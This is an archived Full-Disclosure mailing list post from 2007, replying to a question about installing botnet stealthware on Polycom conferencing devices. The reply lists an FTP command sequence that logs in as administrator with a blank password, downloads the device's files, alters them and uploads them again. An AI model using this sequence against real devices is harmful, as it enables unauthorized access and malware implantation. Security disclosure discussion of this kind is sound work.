[Full-disclosure] Polycom hacking
Paul Schmehl
pauls at utdallas.edu
Fri Jun 29 15:25:21 BST 2007
--On Thursday, June 28, 2007 22:25:08 -0400 Peter Dawson
<slash.pd at gmail.com> wrote:
> interesting concept.. harvesting a polycom device for Botnet's.
>
> hmmmmmmmmm.. the key would be how the heck to get the stealthware on
> such a device ??
>
That's easy.
ftp target.domain.tld
user administrator
pass (blank)
mget *
alter files to suit
mput *
--
Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pkcs7-signature
Size: 3701 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070629/a8e9e1ad/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.